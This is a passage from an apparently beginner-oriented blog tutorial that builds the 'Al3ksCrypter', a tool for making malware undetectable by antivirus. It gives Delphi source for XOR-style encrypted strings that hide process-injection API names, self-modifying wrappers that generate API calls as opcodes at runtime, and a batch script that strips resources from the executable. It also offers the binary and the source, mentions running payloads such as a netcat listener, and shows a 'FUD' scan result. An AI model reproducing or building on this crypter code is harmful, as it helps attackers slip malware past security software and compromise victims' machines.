<span class="Apple-style-span" style="background-color: #050505; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; line-height: 18.1875px;"><br />The program of course allows automatically creating Delphi unit with all strings needed for further API resolution. Something like this:<br /></span><br />
<div class="bbcode_container" style="margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code :</div>
<div class="bbcode_code" style="background-color: #f2f6f8; background-repeat: repeat no-repeat; border: 1px inset; direction: ltr; font-size: 12px; margin: 0px; overflow: scroll; padding: 6px;">
<code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"></code><br /><div class="" style="font-family: monospace; margin: 0px; padding: 0px;">
<code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">unit untStealthLibEncryptedConstants;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">interface</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">const</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">stealth_api_key = 'FFFFFF';</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">//--- ntdll.dll</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">stealth_api_ntdll_dll = #151#162#78#47#246#220#236#211#180;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">//--- kernel32.dll</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">stealth_api_kernel32_dll = #146#179#88#45#255#158#187#141#246#218#85#47;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">//--- ResumeThread</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">stealth_api_ResumeThread = #171#179#89#54#247#151#220#215#170#219#88#39;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">//--- SetThreadContext</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">stealth_api_SetThreadContext = #160#35#175#108#116#81#2#117#36#1#253#77#22#184#249#213;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">//--- GetThreadContext</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">stealth_api_GetThreadContext = #74#15#91#48#30#10#90#169#42#88#179#175#66#122#117#27;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">//--- ZwUnmapViewOfSection</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">stealth_api_ZwUnmapViewOfSection = #44#131#64#41#12#11#153#183#42#190#96#210#201#242#28#239#119#183#72#23;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">//--- VirtualProtectEx</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">stealth_api_VirtualProtectEx = #48#159#184#128#253#89#90#127#8#170#190#50#247#131#160#5;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">//--- WriteProcessMemory</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">stealth_api_WriteProcessMemory = #45#223#165#0#74#26#118#180#87#250#141#13#184#78#61#86#3#145;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">//--- ReadProcessMemory</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">stealth_api_ReadProcessMemory = #238#114#76#133#179#99#51#10#144#167#177#46#40#177#109#225#87;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">//--- CreateProcessA</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">stealth_api_CreateProcessA = #186#164#79#34#238#151#216#205#183#221#92#48#237#58;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">//--- CreateProcessInternalA</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">stealth_api_CreateProcessInternalA = #105#137#69#61#231#85#214#72#52#80#38#81#37#7#230#72#40#30#57#152#146#21;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">implementation</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">end.</code></div>
<code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"></code></div>
</div>
<span class="Apple-style-span" style="background-color: #050505; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; line-height: 18.1875px;"><br />So our antivirus has no chance when will be searching for strings like "WriteProcessMemory" or "CreateProcessA". If only a key you would use for your build will be different: no chance for detection.<br /><br />Ok, we already know that antiviruses are extremely sensitive when certain API functions are called (see the list above). And we must be able to call them to do our dirty stuff. So what can we do? The trick was explained well-enough in the previous lesson: you have to use the undocumented API functions. Those functions are very often just "wrapped" to a well-documented documented functions later.<br /><br />And of course we will be creating code for all API function calls at runtime (as opcodes) - again see my previous lesson for details. Example from Delphi unit untStealthAPI:<br /></span><br />
<div class="bbcode_container" style="margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code :</div>
<div class="bbcode_code" style="background-color: #f2f6f8; background-repeat: repeat no-repeat; border: 1px inset; direction: ltr; font-size: 12px; margin: 0px; overflow: scroll; padding: 6px;">
<code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"></code><br /><div class="" style="font-family: monospace; margin: 0px; padding: 0px;">
<code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">//----------------------------------------stealth WIN API function: ResumeThread (SELF-MODIFYING)</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">function v_ResumeThread(hThread: cardinal): boolean;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">var c: TByteArray;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">fResult: dword;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">oldProtect: DWORD;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">dummyFunc: function: Integer; //--- dummy function</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">begin</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">CreateAPIFunctionTemplate(c, 1); //--- nr of parameters = 1</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">WriteDwordAddress(hThread, c, 2); //--- directly copy the VALUE of the "hThread"</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">WriteCalculatedFunctionAddress(@c,</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">c,</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">6, //--- this points to E8 (where CALL starts!!!)</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">GetProcAddressX(DecryptStringToString(stealth_api_kernel32_dll, stealth_api_key),</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">DecryptStringToString(stealth_api_ResumeThread, stealth_api_key)), //--- ResumeThread</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">5); //--- CALL procedure length (in bytes) = 5</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">@dummyFunc := @c; //--- point inline dummy function to our byte array</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">v_VirtualProtectEx(0, @dummyFunc, SizeOf(dummyFunc), PAGE_EXECUTE_READWRITE, @oldProtect);</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">dummyFunc; //--- execute our function</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">asm mov fResult, eax; end; //--- return our function's result (normally it is stored in EAX)</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">result := boolean(fResult);</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">end;</code></div>
<code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"></code></div>
</div>
<span class="Apple-style-span" style="background-color: #050505; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; line-height: 18.1875px;"><br />or another function:<br /></span><br />
<div class="bbcode_container" style="margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code :</div>
<div class="bbcode_code" style="background-color: #f2f6f8; background-repeat: repeat no-repeat; border: 1px inset; direction: ltr; font-size: 12px; margin: 0px; overflow: scroll; padding: 6px;">
<code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"></code><br /><div class="" style="font-family: monospace; margin: 0px; padding: 0px;">
<code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">//------------------------------------stealth WIN API function: VirtualProtectEx (SELF-MODIFYING)</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">function v_VirtualProtectEx(hProcess: THandle;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">lpAddress: Pointer;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">dwSize,</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">flNewProtect: DWORD;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">lpflOldProtect: Pointer): boolean;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">var c: TByteArray;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">fResult: dword;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">oldProtect: DWORD;</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">dummyFunc: function: Integer; //--- dummy function</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">begin</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">CreateAPIFunctionTemplate(c, 5); //--- nr of parameters = 2</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">WriteDwordAddress(dword(@lpflOldProtect), c, 2); //--- directly copy the VALUE of the "lpflOldProtect" (4 bytes)</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">WriteDwordAddress(flNewProtect, c, 7); //--- directly copy the VALUE of the "flNewProtect" (4 bytes)</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">WriteDwordAddress(dwSize, c, 12); //--- directly copy the VALUE of the "dwSize" (4 bytes)</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">WriteDwordAddress(dword(@lpAddress), c, 17); //--- directly copy the VALUE of the "lpAddress" (4 bytes)</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">WriteDwordAddress(hProcess, c, 22); //--- directly copy the VALUE of the "hproces" (4 bytes)</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">WriteCalculatedFunctionAddress(@c,</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">c,</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">26, //--- this points to E8 (where CALL starts)</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">GetProcAddressX(DecryptStringToString(stealth_api_kernel32_dll, stealth_api_key),</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">DecryptStringToString(stealth_api_VirtualProtectEx, stealth_api_key)), //--- VirtualProtectEx</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">5); //--- CALL procedure length (in bytes)</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">@dummyFunc := @c; //--- point inline function to our byte array</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">VirtualProtect(@dummyFunc, SizeOf(dummyFunc), PAGE_EXECUTE_READWRITE, @oldProtect);</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">dummyFunc; //execute our function</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"><br /></code><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">asm mov fResult, eax; end; //--- return our function's result (normally it is stored in EAX)</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">result := boolean(fResult);</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">end;</code></div>
<code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"></code></div>
</div>
<span class="Apple-style-span" style="background-color: #050505; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; line-height: 18.1875px;"><br />Ok, so everything is combined together, and new shiny Crypter is built. Finally we have to use excellent third-party program Resource Hacker to remove various unneeded data (resources) from our executable. We may create a batch file of this kind:<br /></span><br />
<div class="bbcode_container" style="margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code :</div>
<div class="bbcode_code" style="background-color: #f2f6f8; background-repeat: repeat no-repeat; border: 1px inset; direction: ltr; font-size: 12px; margin: 0px; overflow: scroll; padding: 6px;">
<code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"></code><br /><div class="" style="font-family: monospace; margin: 0px; padding: 0px;">
<code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">@echo on</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">"D:\Resource Hacker\ResHacker.exe" -delete "%1", "%1", StringTable,,</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">"D:\Resource Hacker\ResHacker.exe" -delete "%1", "%1", RCData,DVCLAL,</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">"D:\Resource Hacker\ResHacker.exe" -delete "%1", "%1", RCData,PACKAGEINFO,</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">"D:\Resource Hacker\ResHacker.exe" -delete "%1", "%1", RCData,PACKAGEINFO,</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">"D:\Resource Hacker\ResHacker.exe" -delete "%1", "%1", Cursor,,</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">"D:\Resource Hacker\ResHacker.exe" -delete "%1", "%1", Bitmap,,</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">"D:\Resource Hacker\ResHacker.exe" -delete "%1", "%1", Dialog,,</code><br /><code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;">"D:\Resource Hacker\ResHacker.exe" -delete "%1", "%1", CursorGroup,,</code></div>
<code style="font-style: inherit; line-height: 12px; margin: 0px; padding: 0px;"></code></div>
</div>
<span class="Apple-style-span" style="background-color: #050505; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; line-height: 18.1875px;"><br />Now the Al3ksCrypter is born! :-) You can take the [binary and the source code here].</span><br />
<div align="center" style="margin: 0px; padding: 0px;">
<img alt="" border="0" src="http://itsecuritylab.eu/wp-content/uploads/2010/09/crypter01.png" style="border: 0px; clear: both; max-width: 800px; min-width: 220px; padding: 10px;" /></div>
<span class="Apple-style-span" style="background-color: #050505; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; line-height: 18.1875px;">The application is very simple but has some additional features:<br /><br />* Stub may be optionally compressed by UPX.<br />* Payload may be ran as minimized.<br />* Additional command line parameters may be provided. Your payload will be automatically executed with them (e.g.: port number and optional parameters for netcat listener).<br /><br />You already being seeing the film how the tool works, now I just would show the final screen (here is [direct link to report]):</span><br />
<div align="center" style="margin: 0px; padding: 0px;">
<img alt="" border="0" src="http://itsecuritylab.eu/wp-content/uploads/2010/09/crypter_FUD_result.png" style="border: 0px; clear: both; max-width: 800px; min-width: 220px; padding: 10px;" /></div>
<span class="Apple-style-span" style="background-color: #050505; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; line-height: 18.1875px;">Conclusion</span>

Crypter Bypassing Antivirus how-to For Beginners

[Virus] Crypter Bypassing Antivirus how-to For Beginners Ok my dear IT-boys, accompanied with naughty IT-girls: this is the long-promised ...

Bầu trời của tôi